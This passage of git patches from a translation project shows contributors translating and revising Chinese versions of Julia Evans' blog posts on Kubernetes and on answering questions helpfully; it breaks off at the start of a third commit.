的设计去帮助我确保集群状态的一致性。并且,总在来说,随着时间的推移软件将会提高。你去操作的仅有的有状态的东西是 etcd。 + +不用过多地讨论“状态”这个东西 – 但是,我认为在 Kubernetes 中很酷的一件事情是,唯一需要去做备份/恢复计划的事情是 etcd (除非为你的 pods 使用了持久化存储的卷)。我认为这样可以使 kubernetes 对关于你考虑的事情的操作更容易一些。 + +### 在 Kubernetes 之上实现新的分发系统是非常容易的 + +假设你想去实现一个分发 cron 作业调度系统!从零开始做工作量非常大。但是,在 Kubernetes 里面实现一个分发 cron 作业调度系统是非常容易的!(它仍然是一个分布式系统) + +我第一次读到 Kubernetes 的 cronjob 作业控制器的代码时,它是如此的简单,我真的特别高兴。它在这里,去读它吧,主要的逻辑大约是 400 行。去读它吧! => [cronjob_controller.go][4] <= + +从本质上来看,cronjob 控制器做了: + +* 每 10 秒钟: + * 列出所有已存在的 cronjobs + + * 检查是否有需要现在去运行的任务 + + * 如果有,创建一个新的作业对象去被调度并通过其它的 Kubernetes 控制器去真正地去运行它 + + * 清理已完成的作业 + + * 重复以上工作 + +Kubernetes 模型是很受限制的(它有定义在 etcd 中的资源模式,控制器读取这个资源和更新 etcd),我认为这种相关的固有的/受限制的模型,可以使它更容易地在 Kubernetes 框架中开发你自己的分布式系统。 + +Kamal 介绍给我的 “ Kubernetes 是一个写你自己的分布式系统的很好的平台” 这一想法,而不是“ Kubernetes 是一个你可以使用的分布式系统”,并且,我想我对它真的有兴趣。他有一个 [system to run an HTTP service for every branch you push to github][5] 的雏型。他花了一个周末的时候,大约有了 800 行,我觉得它真的很不错! + +### Kubernetes 可以使你做一些非常神奇的事情(但并不容易) + +我一开始就说 “kubernetes 可以让你做一些很神奇的事情,你可以用一个配置文件来做这么多的基础设施,它太神奇了”,而且这是真的! + +为什么说“Kubernetes 并不容易”呢?,是因为 Kubernetes 有很多的课件去学习怎么去成功地运营一个高可用的 Kubernetes 集群要做很多的工作。就像我发现它给我了许多抽象的东西,我需要去理解这些抽象的东西,为了去调试问题和正确地配置它们。我喜欢学习新东西,因此,它并不会使我发狂或者生气,我只是觉得理解它很重要:) + +对于 “我不能仅依靠抽象概念” 的一个具体的例子是,我一直在努力学习需要的更多的 [Linux 上的关于网络的工作][6],去对设置 Kubernetes 网络有信心,这比我以前学过的关于网络的知识要多很多。这种方式很有意思但是非常费时间。在以后的某个时间,我可以写更多的关于设置 Kubernetes 网络的困难的/有趣的事情。 + +或者,我写一个关于学习 Kubernetes 的不同选项所做事情的 [2000 字的博客文章][7],才能够成功去设置我的 Kubernetes CAs。 + +我觉得,像 GKE (google 的 Kubernetes 生产系统) 这样的一些管理 Kubernetes 的系统可能更简单,因为,他们为你做了许多的决定,但是,我没有尝试过它们。 + +-------------------------------------------------------------------------------- + +via: https://jvns.ca/blog/2017/10/05/reasons-kubernetes-is-cool/ + +作者:[Julia Evans][a] +译者:[qhwdw](https://github.com/qhwdw) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jvns.ca/about +[1]:https://github.com/kamalmarhubi/kubereview +[2]:https://jvns.ca/categories/kubernetes +[3]:https://github.com/kelseyhightower/kubernetes-the-hard-way +[4]:https://github.com/kubernetes/kubernetes/blob/e4551d50e57c089aab6f67333412d3ca64bc09ae/pkg/controller/cronjob/cronjob_controller.go +[5]:https://github.com/kamalmarhubi/kubereview +[6]:https://jvns.ca/blog/2016/12/22/container-networking/ +[7]:https://jvns.ca/blog/2017/08/05/how-kubernetes-certificates-work/ + + From 452410b4be88dfc52f09c8d43c18acbffdfa536c Mon Sep 17 00:00:00 2001 From: TRsky <625310581@qq.com> Date: Fri, 8 Dec 2017 14:03:35 +0800 Subject: [PATCH 0401/1627] mupdate --- ...ow to answer questions in a helpful way.md | 180 +++++++++--------- 1 file changed, 88 insertions(+), 92 deletions(-) diff --git a/sources/tech/20170921 How to answer questions in a helpful way.md b/sources/tech/20170921 How to answer questions in a helpful way.md index 31d6be1046..a01e28fde2 100644 --- a/sources/tech/20170921 How to answer questions in a helpful way.md +++ b/sources/tech/20170921 How to answer questions in a helpful way.md @@ -1,175 +1,171 @@ -translating by HardworkFish -How to answer questions in a helpful way -============================================================ -Your coworker asks you a slightly unclear question. How do you answer? I think asking questions is a skill (see [How to ask good questions][1]) and that answering questions in a helpful way is also a skill! Both of them are super useful. +如何以有用的方式回答问题 +============================= -To start out with – sometimes the people asking you questions don’t respect your time, and that sucks. I’m assuming here throughout that that’s not what happening – we’re going to assume that the person asking you questions is a reasonable person who is trying their best to figure something out and that you want to help them out. Everyone I work with is like that and so that’s the world I live in :) +如果你的同事问你一个不太清晰的问题,你会怎么回答?我认为提问题是一种技巧(可以看 [如何提出有意义的问题][1]) 同时以合理的方式回答问题也是一种技巧。他们都是非常实用的。 -Here are a few strategies for answering questions in a helpful way! +开始 - 有时问你问题的人不尊重你的时间,这很糟糕。 -### If they’re not asking clearly, help them clarify +我假设 - 我们来假设问你问题的人是一个合理的人并且正在尽力解决问题而你想帮助他们。和我一起工作的人是这样,我所生活的世界也是这样。 -Often beginners don’t ask clear questions, or ask questions that don’t have the necessary information to answer the questions. Here are some strategies you can use to help them clarify. +下面是有助于回答问题的一些策略! -* **Rephrase a more specific question** back at them (“Are you asking X?”) +### 如果他们提问不清楚,帮他们澄清 -* **Ask them for more specific information** they didn’t provide (“are you using IPv6?”) +通常初学者不会提出很清晰的问题,或者问一些对回答问题没有必要信息的问题。 -* **Ask what prompted their question**. For example, sometimes people come into my team’s channel with questions about how our service discovery works. Usually this is because they’re trying to set up/reconfigure a service. In that case it’s helpful to ask “which service are you working with? Can I see the pull request you’re working on?” +* ** 重述为一个更明确的问题 ** 回复他们(”你是想问 X ?“) -A lot of these strategies come from the [how to ask good questions][2] post. (though I would never say to someone “oh you need to read this Document On How To Ask Good Questions before asking me a question”) +* ** 问他们更具体的信息 ** 他们并没有提供(”你使用 IPv6 ?”) -### Figure out what they know already +* ** 问是什么导致了他们的问题 ** 例如,有时有些人会进入我的团队频道,询问我们的 service discovery 如何工作的。这通常是因为他们试图设置/重新配置服务。在这种情况下,如果问“你正在使用哪种服务?可以给我看看你正在进行的 pull 请求吗?”是有帮助的。这些策略很多来自 [如何提出有意义的问题][2]。(尽管我永远不会对某人说“oh 你得先看完文档 “如何提出有意义的问题” 再来问我问题) -Before answering a question, it’s very useful to know what the person knows already! +这些策略很多来自[如何提出有意义的问题][2]中的要点。 -Harold Treen gave me a great example of this: +### 明白什么是他们已经知道的 -> Someone asked me the other day to explain “Redux Sagas”. Rather than dive in and say “They are like worker threads that listen for actions and let you update the store!”  -> I started figuring out how much they knew about Redux, actions, the store and all these other fundamental concepts. From there it was easier to explain the concept that ties those other concepts together. +在回答问题之前,知道对方已经知道什么是非常有用的! -Figuring out what your question-asker knows already is important because they may be confused about fundamental concepts (“What’s Redux?”), or they may be an expert who’s getting at a subtle corner case. An answer building on concepts they don’t know is confusing, and an answer that recaps things they know is tedious. +Harold Treen 给了我一个很好的例子: -One useful trick for asking what people know – instead of “Do you know X?”, maybe try “How familiar are you with X?”. +> 前几天,有人请我解释“ Redux-Sagas ”。与其深入解释不如说“ 他们就像 worker threads 监听行为,让你更新 Redux store 。 -### Point them to the documentation +> 我开始搞清楚他们对 Redux 、行为(actions)、store 以及其他基本概念了解多少。将这些概念都联系在一起来解释概念会容易得多。 -“RTFM” is the classic unhelpful answer to a question, but pointing someone to a specific piece of documentation can actually be really helpful! When I’m asking a question, I’d honestly rather be pointed to documentation that actually answers my question, because it’s likely to answer other questions I have too. +弄清楚问你问题的人已经知道什么是非常重要的。因为有时他们可能会对基础概念感到疑惑(“ Redux 是什么?“),或者他们可是是专家并恰遇到了微妙的极端情况(corner case)。如果答案建立在他们不知道的概念上会令他们困惑,且重述他们已经知道的的会是乏味的。 -I think it’s important here to make sure you’re linking to documentation that actually answers the question, or at least check in afterwards to make sure it helped. Otherwise you can end up with this (pretty common) situation: +这里有一个有用的技巧问他们已经知道什么 - 比如可以尝试用“你对 X 了解多少?”而不是问“你知道 X 吗?”。 -* Ali: How do I do X? +### 给他们一个文档 -* Jada: +“RTFM” (“去读那些他妈的手册”(Read The Fucking Manual))是一个典型的无用的回答,但事实上如果向他们指明一个特定的文档会是非常有用的!当我提问题的时候,我非常乐意被指明那些事实上能够解决我的问题的文档,因为它可能解决了其他我也想问的问题。 -* Ali: That doesn’t actually explain how to X, it only explains Y! +我认为明确你所指明的文档确实能够解决问题或者至少经过查阅明确它有用是非常重要的。否则,你可能将以下面这种情形结束对话(非常常见): -If the documentation I’m linking to is very long, I like to point out the specific part of the documentation I’m talking about. The [bash man page][3] is 44,000 words (really!), so just saying “it’s in the bash man page” is not that helpful :) +* Ali:我应该如何处理 X ? -### Point them to a useful search +* Jada:<文档链接> -Often I find things at work by searching for some Specific Keyword that I know will find me the answer. That keyword might not be obvious to a beginner! So saying “this is the search I’d use to find the answer to that question” can be useful. Again, check in afterwards to make sure the search actually gets them the answer they need :) +* Ali: 这个并有实际解释如何处理 X ,它仅仅解释了如何处理 Y ! -### Write new documentation +如果我所给的文档特别长,我会指明文档中那个我将会谈及的特定部分。[bash 手册][3] 有44000个字(真的!),所以只说“它在 bash 手册中有说明”是没有用的:) -People often come and ask my team the same questions over and over again. This is obviously not the fault of the people (how should  _they_  know that 10 people have asked this already, or what the answer is?). So we’re trying to, instead of answering the questions directly, +### 告诉他们一个有用的搜索 -1. Immediately write documentation +在工作中,经常我发现我可以利用我所知道的关键字进行搜索找到能够解决我的问题的答案。对于初学者来说,这些关键字往往不是那么明显。所以说“这是我用来寻找这个答案的搜索”可能有用些。再次说明,回答时请经检查后以确保搜索能够得到他们所需要的答案。 -2. Point the person to the new documentation we just wrote +### 写新文档 -3. Celebrate! +人们经常一次又一次地问我的团队重复的问题。很显然这并不是人们的错(他们怎么能够知道在他们之前已经有10个人问了这个问题,且知道答案是什么呢?)因此,我们尝试写文档,而不是直接回答回答问题。 -Writing documentation sometimes takes more time than just answering the question, but it’s often worth it! Writing documentation is especially worth it if: +1. 马上写新文档 -a. It’s a question which is being asked again and again b. The answer doesn’t change too much over time (if the answer changes every week or month, the documentation will just get out of date and be frustrating) +2. 给他们我们刚刚写好的新文档 -### Explain what you did +3. 公示 -As a beginner to a subject, it’s really frustrating to have an exchange like this: +写文档有时往往比回答问题需要花很多时间,但这是值得的。写文档尤其值得如果: -* New person: “hey how do you do X?” +a. 这个问题被问了一遍又一遍 -* More Experienced Person: “I did it, it is done.” +b. 随着时间的推移,这个答案不会变化太大(如果这个答案每一个星期或者一个月就会变化,文档就会过时并且令人受挫) -* New person: ….. but what did you DO?! +### 解释你做了什么 -If the person asking you is trying to learn how things work, it’s helpful to: +对于一个话题,作为初学者来说,这样的交流会真让人沮丧: -* Walk them through how to accomplish a task instead of doing it yourself +* 新人:“hey 你如何处理 X ?” -* Tell them the steps for how you got the answer you gave them! +* 更加有经验的人:“我做了,它完成了” -This might take longer than doing it yourself, but it’s a learning opportunity for the person who asked, so that they’ll be better equipped to solve such problems in the future. +* 新人:”...... 但是你做了什么?!“ -Then you can have WAY better exchanges, like this: +如果问你问题的人想知道事情是如何进行的,这样是有帮助的: -* New person: “I’m seeing errors on the site, what’s happening?” +* 让他们去完成任务而不是自己做 -* More Experienced Person: (2 minutes later) “oh that’s because there’s a database failover happening” +* 把你是如何得到你给他们的答案的步骤告诉他们。 -* New person: how did you know that??!?!? +这可能比你自己做的时间还要长,但对于被问的人来说这是一个学习机会,因为那样做使得他们将来能够更好地解决问题。 -* More Experienced Person: “Here’s what I did!”: - 1. Often these errors are due to Service Y being down. I looked at $PLACE and it said Service Y was up. So that wasn’t it. +这样,你可以进行更好的交流,像这: - 2. Then I looked at dashboard X, and this part of that dashboard showed there was a database failover happening. +* 新人:“这个网站出现了错误,发生了什么?” - 3. Then I looked in the logs for the service and it showed errors connecting to the database, here’s what those errors look like. +* 有经验的人:(2分钟后)”oh 这是因为发生了数据库故障转移“ -If you’re explaining how you debugged a problem, it’s useful both to explain how you found out what the problem was, and how you found out what the problem wasn’t. While it might feel good to look like you knew the answer right off the top of your head, it feels even better to help someone improve at learning and diagnosis, and understand the resources available. +* 新人: ”你是怎么知道的??!?!?“ -### Solve the underlying problem +* 有经验的人:“以下是我所做的!“: -This one is a bit tricky. Sometimes people think they’ve got the right path to a solution, and they just need one more piece of information to implement that solution. But they might not be quite on the right path! For example: +1. 通常这些错误是因为服务器 Y 被关闭了。我查看了一下 `$PLACE` 但它表明服务器 Y 开着。所以,并不是这个原因导致的。 -* George: I’m doing X, and I got this error, how do I fix it +2. 然后我查看仪表 X ,这个仪表的这个部分显示这里发生了数据库故障转移。 -* Jasminda: Are you actually trying to do Y? If so, you shouldn’t do X, you should do Z instead +3. 然后我在日志中找到了相应服务器,并且它显示连接数据库错误,看起来错误就是这里。 -* George: Oh, you’re right!!! Thank you! I will do Z instead. +如果你正在解释你是如何调试一个问题,解释你是如何发现问题,以及如何找出问题是非常有用的当看起来似乎你已经得到正确答案时,感觉是很棒的。这比你帮助他人提高学习和诊断能力以及明白充分利用可用资源的感觉还要好。 -Jasminda didn’t answer George’s question at all! Instead she guessed that George didn’t actually want to be doing X, and she was right. That is helpful! +### 解决根本问题 -It’s possible to come off as condescending here though, like +这一点有点狡猾。有时候人们认为他们依旧找到了解决问题的正确途径,且他们只需要一条信息就可以把问题解决。但他们可能并不是走在正确的道路上!比如: -* George: I’m doing X, and I got this error, how do I fix it? +* George:”我在处理 X 的时候遇到了错误,我该如何修复它?“ -* Jasminda: Don’t do that, you’re trying to do Y and you should do Z to accomplish that instead. +* Jasminda:”你是正在尝试解决 Y 吗?如果是这样,你不应该处理 X ,反而你应该处理 Z 。“ -* George: Well, I am not trying to do Y, I actually want to do X because REASONS. How do I do X? +* George:“噢,你是对的!!!谢谢你!我回反过来处理 Z 的。“ -So don’t be condescending, and keep in mind that some questioners might be attached to the steps they’ve taken so far! It might be appropriate to answer both the question they asked and the one they should have asked: “Well, if you want to do X then you might try this, but if you’re trying to solve problem Y with that, you might have better luck doing this other thing, and here’s why that’ll work better”. +Jasminda 一点都没有回答 George 的问题!反而,她猜测 George 并不想处理 X ,并且她是猜对了。这是非常有用的! -### Ask “Did that answer your question?” +如果你这样做可能会产生居高临下的感觉: -I always like to check in after I  _think_  I’ve answered the question and ask “did that answer your question? Do you have more questions?”. +* George:”我在处理 X 的时候遇到了错误,我该如何修复它?“ -It’s good to pause and wait after asking this because often people need a minute or two to know whether or not they’ve figured out the answer. I especially find this extra “did this answer your questions?” step helpful after writing documentation! Often when writing documentation about something I know well I’ll leave out something very important without realizing it. +* Jasminda:不要这样做,如果你想处理 Y ,你应该反过来完成 Z 。 -### Offer to pair program/chat in real life +* George:“好吧,我并不是想处理 Y 。实际上我想处理 X 因为某些原因(REASONS)。所以我该如何处理 X 。 -I work remote, so many of my conversations at work are text-based. I think of that as the default mode of communication. +所以不要居高临下,且要记住有时有些提问者可能已经偏离根本问题很远了。同时回答提问者提出的问题以及他们本该提出的问题的恰当的:“嗯,如果你想处理 X ,那么你可能需要这么做,但如果你想用这个解决 Y 问题,可能通过处理其他事情你可以更好地解决这个问题,这就是为什么可以做得更好的原因。 -Today, we live in a world of easy video conferencing & screensharing! At work I can at any time click a button and immediately be in a video call/screensharing session with someone. Some problems are easier to talk about using your voices! +### 询问”那个回答可以解决您的问题吗?” -For example, recently someone was asking about capacity planning/autoscaling for their service. I could tell there were a few things we needed to clear up but I wasn’t exactly sure what they were yet. We got on a quick video call and 5 minutes later we’d answered all their questions. +我总是喜欢在我回答了问题之后核实是否真的已经解决了问题:”那个回答解决了您的问题吗?您还有其他问题吗?“在问完这个之后等待一会是很好的,因为人们通常需要一两分钟来知道他们是否已经找到了答案。 -I think especially if someone is really stuck on how to get started on a task, pair programming for a few minutes can really help, and it can be a lot more efficient than email/instant messaging. +我发现尤其是问“这个回答解决了您的问题吗”这句在写文档时是非常有用的。通常,在写我关于我熟悉的东西的文档时,我会忽略掉重要的东西。 -### Don’t act surprised +### Offer to。。。。 -This one’s a rule from the Recurse Center: [no feigning surprise][4]. Here’s a relatively common scenario +我是远程工作的,所以我的很多对话都是基于文本的。我认为这是默认的沟通方式。 -* Human 1: “what’s the Linux kernel?” +今天,我们生活在一个简单的视频会议和屏幕共享的世界!在工作时候,我可以在任何时间点击一个按钮并快速处在与他人的视频对话或者屏幕共享的对话中! -* Human 2: “you don’t know what the LINUX KERNEL is?!!!!?!!!???” +例如,最近有人问我关于容量规划/自动缩放。。。 -Human 2’s reaction (regardless of whether they’re  _actually_  surprised or not) is not very helpful. It mostly just serves to make Human 1 feel bad that they don’t know what the Linux kernel is. +### 不要表现得过于惊讶 -I’ve worked on actually pretending not to be surprised even when I actually am a bit surprised the person doesn’t know the thing and it’s awesome. +这是源自 Recurse Center 的一则法则:[不要假装惊讶][4]。这里有一个常见的情景: -### Answering questions well is awesome +* 某人1:“什么是 Linux 内核” -Obviously not all these strategies are appropriate all the time, but hopefully you will find some of them helpful! I find taking the time to answer questions and teach people can be really rewarding. +* 某人2:“你竟然不知道什么是 Linux 内核(LINUX KERNEL)?!!!!?!!!????” + +某人2表现(无论他们是否真的如此惊讶)是没有帮助的。这大部分只会让某人1感觉不好,因为他们不知道什么的 Linux 内核。 + +我一直在假装不惊讶即使我事实上确实有点惊讶那个人不知道这种东西但它是令人敬畏的。 + +### 回答问题是令人敬畏的 + +很显然,这些策略并不是一直都是适当的,但希望你能够发现这里有些是有用的!我发现花时间去回答问题并教人们是其实是很有收获的。 + +特别感谢 Josh Triplett 的一些建议并做了很多有益的补充,以及感谢 Harold Treen、Vaibhav Sagar、Peter Bhat Hatkins、Wesley Aptekar Cassels 和 Paul Gowder的阅读或评论。 + + -Special thanks to Josh Triplett for suggesting this post and making many helpful additions, and to Harold Treen, Vaibhav Sagar, Peter Bhat Harkins, Wesley Aptekar-Cassels, and Paul Gowder for reading/commenting. --------------------------------------------------------------------------------- -via: https://jvns.ca/blog/answer-questions-well/ -作者:[ Julia Evans][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 -[a]:https://jvns.ca/about -[1]:https://jvns.ca/blog/good-questions/ -[2]:https://jvns.ca/blog/good-questions/ -[3]:https://linux.die.net/man/1/bash -[4]:https://jvns.ca/blog/2017/04/27/no-feigning-surprise/ From 66ba5bae5bbbf2c974b18525847eade78911d6cb Mon Sep 17 00:00:00 2001 From: TRsky <625310581@qq.com> Date: Fri, 8 Dec 2017 14:23:31 +0800 Subject: [PATCH 0402/1627] update --- ...ow to answer questions in a helpful way.md | 96 +++++++++++-------- 1 file changed, 55 insertions(+), 41 deletions(-) diff --git a/sources/tech/20170921 How to answer questions in a helpful way.md b/sources/tech/20170921 How to answer questions in a helpful way.md index a01e28fde2..8c5507a030 100644 --- a/sources/tech/20170921 How to answer questions in a helpful way.md +++ b/sources/tech/20170921 How to answer questions in a helpful way.md @@ -1,14 +1,12 @@ - - -如何以有用的方式回答问题 +如何合理地回答问题 ============================= -如果你的同事问你一个不太清晰的问题,你会怎么回答?我认为提问题是一种技巧(可以看 [如何提出有意义的问题][1]) 同时以合理的方式回答问题也是一种技巧。他们都是非常实用的。 +如果你的同事问你一个不太清晰的问题,你会怎么回答?我认为提问题是一种技巧(可以看 [如何提出有意义的问题][1]) 同时,合理地回答问题也是一种技巧。他们都是非常实用的。 -开始 - 有时问你问题的人不尊重你的时间,这很糟糕。 +开始 - 有时向你提问的人不尊重你的时间,这很糟糕。 -我假设 - 我们来假设问你问题的人是一个合理的人并且正在尽力解决问题而你想帮助他们。和我一起工作的人是这样,我所生活的世界也是这样。 +我假设 - 我们假设问你问题的人是一个合理的人并且正在尽力解决问题而你想帮助他们。和我一起工作的人是这样,我所生活的世界也是这样。 下面是有助于回答问题的一些策略! @@ -16,11 +14,11 @@ 通常初学者不会提出很清晰的问题,或者问一些对回答问题没有必要信息的问题。 -* ** 重述为一个更明确的问题 ** 回复他们(”你是想问 X ?“) +* ** 重述为一个更明确的问题 ** 回复他们(”你是想问 X ?“) -* ** 问他们更具体的信息 ** 他们并没有提供(”你使用 IPv6 ?”) +* ** 问他们更具体的信息 ** 他们并没有提供(”你使用 IPv6 ?”) -* ** 问是什么导致了他们的问题 ** 例如,有时有些人会进入我的团队频道,询问我们的 service discovery 如何工作的。这通常是因为他们试图设置/重新配置服务。在这种情况下,如果问“你正在使用哪种服务?可以给我看看你正在进行的 pull 请求吗?”是有帮助的。这些策略很多来自 [如何提出有意义的问题][2]。(尽管我永远不会对某人说“oh 你得先看完文档 “如何提出有意义的问题” 再来问我问题) +* ** 问是什么导致了他们的问题 ** 例如,有时有些人会进入我的团队频道,询问我们的 service discovery 如何工作的。这通常是因为他们试图设置/重新配置服务。在这种情况下,如果问“你正在使用哪种服务?可以给我看看你正在进行的 pull 请求吗?”是有帮助的。这些策略很多来自 [如何提出有意义的问题][2]。(尽管我永远不会对某人说“噢,你得先看完文档 “如何提出有意义的问题” 再来问我问题) 这些策略很多来自[如何提出有意义的问题][2]中的要点。 @@ -32,11 +30,11 @@ Harold Treen 给了我一个很好的例子: > 前几天,有人请我解释“ Redux-Sagas ”。与其深入解释不如说“ 他们就像 worker threads 监听行为,让你更新 Redux store 。 -> 我开始搞清楚他们对 Redux 、行为(actions)、store 以及其他基本概念了解多少。将这些概念都联系在一起来解释概念会容易得多。 +> 我开始搞清楚他们对 Redux 、行为(actions)、store 以及其他基本概念了解多少。将这些概念都联系在一起再来解释会容易得多。 -弄清楚问你问题的人已经知道什么是非常重要的。因为有时他们可能会对基础概念感到疑惑(“ Redux 是什么?“),或者他们可是是专家并恰遇到了微妙的极端情况(corner case)。如果答案建立在他们不知道的概念上会令他们困惑,且重述他们已经知道的的会是乏味的。 +弄清楚问你问题的人已经知道什么是非常重要的。因为有时他们可能会对基础概念感到疑惑(“ Redux 是什么?“),或者他们可是专家但是恰巧遇到了微妙的极端情况(corner case)。如果答案建立在他们不知道的概念上会令他们困惑,但如果重述他们已经知道的的又会是乏味的。 -这里有一个有用的技巧问他们已经知道什么 - 比如可以尝试用“你对 X 了解多少?”而不是问“你知道 X 吗?”。 +这里有一个很实用的技巧来了解他们已经知道什么 - 比如可以尝试用“你对 X 了解多少?”而不是问“你知道 X 吗?”。 ### 给他们一个文档 @@ -44,27 +42,27 @@ Harold Treen 给了我一个很好的例子: 我认为明确你所指明的文档确实能够解决问题或者至少经过查阅明确它有用是非常重要的。否则,你可能将以下面这种情形结束对话(非常常见): -* Ali:我应该如何处理 X ? +* Ali:我应该如何处理 X ? -* Jada:<文档链接> +* Jada:<文档链接> -* Ali: 这个并有实际解释如何处理 X ,它仅仅解释了如何处理 Y ! +* Ali: 这个并有实际解释如何处理 X ,它仅仅解释了如何处理 Y ! -如果我所给的文档特别长,我会指明文档中那个我将会谈及的特定部分。[bash 手册][3] 有44000个字(真的!),所以只说“它在 bash 手册中有说明”是没有用的:) +如果我所给的文档特别长,我会指明文档中那个我将会谈及的特定部分。[bash 手册][3] 有44000个字(真的!),所以如果只说“它在 bash 手册中有说明”是没有帮助的:) ### 告诉他们一个有用的搜索 -在工作中,经常我发现我可以利用我所知道的关键字进行搜索找到能够解决我的问题的答案。对于初学者来说,这些关键字往往不是那么明显。所以说“这是我用来寻找这个答案的搜索”可能有用些。再次说明,回答时请经检查后以确保搜索能够得到他们所需要的答案。 +在工作中,我经常发现我可以利用我所知道的关键字进行搜索找到能够解决我的问题的答案。对于初学者来说,这些关键字往往不是那么明显。所以说“这是我用来寻找这个答案的搜索”可能有用些。再次说明,回答时请经检查后以确保搜索能够得到他们所需要的答案。 ### 写新文档 人们经常一次又一次地问我的团队重复的问题。很显然这并不是人们的错(他们怎么能够知道在他们之前已经有10个人问了这个问题,且知道答案是什么呢?)因此,我们尝试写文档,而不是直接回答回答问题。 -1. 马上写新文档 +1. 马上写新文档 -2. 给他们我们刚刚写好的新文档 +2. 给他们我们刚刚写好的新文档 -3. 公示 +3. 公示 写文档有时往往比回答问题需要花很多时间,但这是值得的。写文档尤其值得如果: @@ -76,35 +74,35 @@ b. 随着时间的推移,这个答案不会变化太大(如果这个答案 对于一个话题,作为初学者来说,这样的交流会真让人沮丧: -* 新人:“hey 你如何处理 X ?” +* 新人:“hey 你如何处理 X ?” -* 更加有经验的人:“我做了,它完成了” +* 有经验的人:“我做了,它完成了” -* 新人:”...... 但是你做了什么?!“ +* 新人:”...... 但是你做了什么?!“ 如果问你问题的人想知道事情是如何进行的,这样是有帮助的: -* 让他们去完成任务而不是自己做 +* 让他们去完成任务而不是自己做 -* 把你是如何得到你给他们的答案的步骤告诉他们。 +* 把你是如何得到你给他们的答案的步骤告诉他们。 这可能比你自己做的时间还要长,但对于被问的人来说这是一个学习机会,因为那样做使得他们将来能够更好地解决问题。 这样,你可以进行更好的交流,像这: -* 新人:“这个网站出现了错误,发生了什么?” +* 新人:“这个网站出现了错误,发生了什么?” -* 有经验的人:(2分钟后)”oh 这是因为发生了数据库故障转移“ +* 有经验的人:(2分钟后)”oh 这是因为发生了数据库故障转移“ + +* 新人: ”你是怎么知道的??!?!?“ -* 新人: ”你是怎么知道的??!?!?“ +* 有经验的人:“以下是我所做的!“: -* 有经验的人:“以下是我所做的!“: + 1. 通常这些错误是因为服务器 Y 被关闭了。我查看了一下 `$PLACE` 但它表明服务器 Y 开着。所以,并不是这个原因导致的。 -1. 通常这些错误是因为服务器 Y 被关闭了。我查看了一下 `$PLACE` 但它表明服务器 Y 开着。所以,并不是这个原因导致的。 + 2. 然后我查看仪表 X ,这个仪表的这个部分显示这里发生了数据库故障转移。 -2. 然后我查看仪表 X ,这个仪表的这个部分显示这里发生了数据库故障转移。 - -3. 然后我在日志中找到了相应服务器,并且它显示连接数据库错误,看起来错误就是这里。 + 3. 然后我在日志中找到了相应服务器,并且它显示连接数据库错误,看起来错误就是这里。 如果你正在解释你是如何调试一个问题,解释你是如何发现问题,以及如何找出问题是非常有用的当看起来似乎你已经得到正确答案时,感觉是很棒的。这比你帮助他人提高学习和诊断能力以及明白充分利用可用资源的感觉还要好。 @@ -112,21 +110,21 @@ b. 随着时间的推移,这个答案不会变化太大(如果这个答案 这一点有点狡猾。有时候人们认为他们依旧找到了解决问题的正确途径,且他们只需要一条信息就可以把问题解决。但他们可能并不是走在正确的道路上!比如: -* George:”我在处理 X 的时候遇到了错误,我该如何修复它?“ +* George:”我在处理 X 的时候遇到了错误,我该如何修复它?“ -* Jasminda:”你是正在尝试解决 Y 吗?如果是这样,你不应该处理 X ,反而你应该处理 Z 。“ +* Jasminda:”你是正在尝试解决 Y 吗?如果是这样,你不应该处理 X ,反而你应该处理 Z 。“ -* George:“噢,你是对的!!!谢谢你!我回反过来处理 Z 的。“ +* George:“噢,你是对的!!!谢谢你!我回反过来处理 Z 的。“ Jasminda 一点都没有回答 George 的问题!反而,她猜测 George 并不想处理 X ,并且她是猜对了。这是非常有用的! 如果你这样做可能会产生居高临下的感觉: -* George:”我在处理 X 的时候遇到了错误,我该如何修复它?“ +* George:”我在处理 X 的时候遇到了错误,我该如何修复它?“ -* Jasminda:不要这样做,如果你想处理 Y ,你应该反过来完成 Z 。 +* Jasminda:不要这样做,如果你想处理 Y ,你应该反过来完成 Z 。 -* George:“好吧,我并不是想处理 Y 。实际上我想处理 X 因为某些原因(REASONS)。所以我该如何处理 X 。 +* George:“好吧,我并不是想处理 Y 。实际上我想处理 X 因为某些原因(REASONS)。所以我该如何处理 X 。 所以不要居高临下,且要记住有时有些提问者可能已经偏离根本问题很远了。同时回答提问者提出的问题以及他们本该提出的问题的恰当的:“嗯,如果你想处理 X ,那么你可能需要这么做,但如果你想用这个解决 Y 问题,可能通过处理其他事情你可以更好地解决这个问题,这就是为什么可以做得更好的原因。 @@ -148,9 +146,9 @@ Jasminda 一点都没有回答 George 的问题!反而,她猜测 George 并 这是源自 Recurse Center 的一则法则:[不要假装惊讶][4]。这里有一个常见的情景: -* 某人1:“什么是 Linux 内核” +* 某人1:“什么是 Linux 内核” -* 某人2:“你竟然不知道什么是 Linux 内核(LINUX KERNEL)?!!!!?!!!????” +* 某人2:“你竟然不知道什么是 Linux 内核(LINUX KERNEL)?!!!!?!!!????” 某人2表现(无论他们是否真的如此惊讶)是没有帮助的。这大部分只会让某人1感觉不好,因为他们不知道什么的 Linux 内核。 @@ -162,6 +160,22 @@ Jasminda 一点都没有回答 George 的问题!反而,她猜测 George 并 特别感谢 Josh Triplett 的一些建议并做了很多有益的补充,以及感谢 Harold Treen、Vaibhav Sagar、Peter Bhat Hatkins、Wesley Aptekar Cassels 和 Paul Gowder的阅读或评论。 +-------------------------------------------------------------------------------- + +via: https://jvns.ca/blog/answer-questions-well/ + +作者:[ Julia Evans][a] +译者:[HardworkFish](https://github.com/HardworkFish) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jvns.ca/about +[1]:https://jvns.ca/blog/good-questions/ +[2]:https://jvns.ca/blog/good-questions/ +[3]:https://linux.die.net/man/1/bash +[4]:https://jvns.ca/blog/2017/04/27/no-feigning-surprise/ + From b19adcc3a312114667047e5409aad92006ae59e4 Mon Sep 17 00:00:00 2001 From: TRsky <625310581@qq.com> Date: Fri, 8 Dec 2017 14:32:28 +0800 Subject: [PATCH 0403/1627] update --- .../20170921 How to answer questions in a helpful way.md | 9 +++++---- 1 file changed, 5 insertions(+), 4 